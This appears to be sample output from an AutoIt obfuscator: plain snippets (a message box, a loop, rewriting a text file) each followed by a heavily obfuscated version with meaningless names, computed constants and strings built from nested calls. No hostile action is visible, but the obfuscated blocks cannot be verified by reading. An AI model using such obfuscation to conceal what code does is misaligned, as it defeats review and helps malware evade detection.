=========================================================
MsgBox($MB_SYSTEMMODAL, "Test", "This is a test message")
=========================================================

$l1($q(4451,355),$l1ll($g($l(84,$q((((13*(43*(20*4-72)/86)-44)*(((7*5-26)*6-51)*34-93)-65)*74/74),$l($q($l(24,50),25),33))))&_
$g($l(98,$l(((7*3-14)*(20*((11*4-39)*14-65)-97)-18),$q((10*(42*((19*5-87)*4/8)/21)-73),$1($l(2,55),52)))))&$g($l(69,$1($l($1($q(32,25),42),_
$l(40,40)),$l(((5*19-90)*15-72),$q($q(17,56),28)))))&$g($1(84,87))),$l1ll($g($l(69,$q($1($q(7,56),39),3)))&$g($q($q(96,78),73))&_
$g($l(97,65))&$g($q(85,$1($q(31,40),$q(70,96))))&$g($q($q((8*(11*(18*15/45)-61)-30),$q(91,97)),67))&$g($q(71,$l((14*(5*4-18)/14),_
$1($l(13,38),98))))&$g($q(65,$1($q(97,92),$q(25,53))))&$g($q(7,$l($q(3,$1($1($q(14,40),32),38)),$1($1(53,53),37))))&$g($l(84,$1($q($q(44,2),_
(5*19-78)),52)))&$g($q($q($1($q(47,26),$l(32,17)),27),89))&$g($q($q(26,$1($1(97,47),$l(40,37))),94))&$g($l(96,20))&$g($q(7,$1(39,$q(55,24))))&_
$g($q($l(10,51),90))&$g($q(7,39))&$g($l(96,51))&$g($q(68,$l((16*17/68),45)))&$g($q(7,39))&$g($q(35,80))&$g($q(92,$l((8*(20*4-71)-55),53)))&_
$g($q($q(96,$1(83,72)),72))&$g($q(28,72))))


==================
Local $output = 0
For $x = 0 To 4
	$output += 1
Next
==================

Local $_11l1ll11ll=((60^((12*((23*3-61)*((3*4-7)*17-76)-65)-79)*11-53)/45-76)*((5*15-70)*16-71)-36)
For $_lllll11l1l=(12*(((((10*7-64)*((11*6-61)*((10*9-87)*16-40)-35)-24)*13-72)*(6*(12*3-33)-9)-51)*16-40)-96) To (52*(11*((6*(3*25-66)-51)*33-96)-31)/26)
$_11l1ll11ll+=((((33*(10*((3*33-93)*3-9)-87)-91)*11-84)*21-80)*18-71)
Next


=============================================
Local $file = @ScriptDir & "\test.txt"
Local $aArray = FileReadToArray($file)
Local $hFile = FileOpen($file, $FO_OVERWRITE)
_FileWriteFromArray($hFile, $aArray)
FileClose($hFile)
=============================================

Local $_lll11l1llll=$_ll111111l&$_l1llll111ll($g($l(84,$l($q((13*(((34*3-93)*11-96)*13-30)-98),$l($l(49,35),50)),_
$q((33*(3*33-96)-91),$q((25*(18*3-50)-94),$1($q(32,31),46))))))&$g($l($q(21,53),88))&$g($l(84,$l(20,$1($q(40,20),_
$1($l(49,38),53)))))&$g($q(((3*33-93)*12-68),$q(72,98)))&$g($q(((3*13-36)*31-91),118))&$g($q(65,$1($l(19,51),$q(90,96))))&_
$g($l(97,69))&$g($q($q(28,$l($1($q(77,115),53),6)),94))&$g($1(94,92)))
Local $_11l1ll1l1l11=$_11l1l11ll1l($_lll11l1llll)
Local $_l1lll11111=$_1l11l1111ll($_lll11l1llll,(((3*20-57)*(16*3-41)-18)*31-91))
_lll1l1ll($_l1lll11111,$_11l1ll1l1l11)
$_11l1ll11111($_l1lll11111)

